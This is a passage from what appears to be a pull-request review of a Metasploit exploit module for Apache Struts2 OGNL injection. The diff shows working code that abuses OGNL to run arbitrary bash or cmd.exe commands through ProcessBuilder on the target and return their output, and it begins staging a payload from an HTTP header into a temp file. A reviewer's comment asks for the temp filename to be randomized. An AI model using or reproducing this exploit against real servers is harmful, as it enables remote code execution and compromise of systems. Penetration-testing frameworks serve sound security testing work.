modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+      fail_with(Failure::UnexpectedReply, 'Server did not respond properly to profiling attempt.')
+    end
+  end
+
+  def execute_command(cmd_input, opts={})    # WTF is opts for?
+    # Semicolons appear to be a bad character in OGNL.  cmdstager doesn't understand that.
+    #   We'll replace ';' with '||' and hope for the best
+
+    if (cmd_input.include?';')
+      print_error("WARNING: Command contains bad characters: semicolons (;).  Substituting '||'")
+      vprint_status("BEFORE: #{cmd_input}")
+      cmd_input = cmd_input.gsub(";" ,"||")
+      vprint_status("AFTER: #{cmd_input}")
+    end
+
+    properties = profile_target
+    
+    os = properties[:'os.name'].downcase
+    if os.include?'linux' or os.include?'nix'
+      cmd = "{'bash','-c','#{cmd_input}'}"
+    elsif os.include?'win'
+      cmd = "{'cmd.exe','/c','#{cmd_input}'}"
+    else
+      vprint_error("Failed to detect target OS.  Attempting to execute command directly")
+      cmd = cmd_input
+    end
+
+    # The following OGNL will run arbitrary commands on Windows and Linux
+    #   targets, as well as returning STDOUT and STDERR.  In my testing,
+    #   on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.
+
+    vprint_status("Executing: #{cmd}")
+
+    ognl = "(#_memberAccess['allowStaticMethodAccess']=true)."
+    ognl << "(#p=new java.lang.ProcessBuilder(#{cmd}))."
+    ognl << "(#p.redirectErrorStream(true))."
+    ognl << "(#process=#p.start())."
+    ognl << "(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))."
+    ognl << "(#r.flush())"
+
+    r = send_struts_request(ognl)
+
+    if r && r.code == 200
+      print_good("Command executed:\n#{r.body}")
+    else
+      print_error("Failed to run command.  Response from server: #{r.to_s}")
+    end
+  end
+
+  def send_payload()
+    # Probe for the target OS and architecture
+    properties = profile_target
+    
+    os = properties[:'os.name'].downcase
+    if os.include?'win'
+      fail_with(Failure::NoTarget,"Windows currently unsupported.")
+      #execute_cmdstager(flavor: :vbs)
+    elsif os.include?'linux' or os.include?'nix'
+      # cool.  Keep going
+    else
+      print_error("Unrecognized operating system.")
+      fail_with(Failure::NoTarget, "Unsupported target platform!")
+    end
+
+    data_header = datastore['HEADER']
+    if data_header.empty?
+      fail_with(Failure::BadConfig,"HEADER parameter cannot be blank when sending a payload")
+    end
+
+    # d = data stream from HTTP header
+    # f = path to temp file
+    # s = stream/handle to temp file
+    ognl  = "(#_memberAccess['allowStaticMethodAccess']=true)."
+    ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
+    ognl << %Q|(#f=@java.io.File@createTempFile('deleteme','tmp')).|
```

Comment:
Please randomize this temp filename!

Reply:
Oooo, yes!  I've gone ahead and randomized it, but made it an advanced option:  `TEMPFILE`.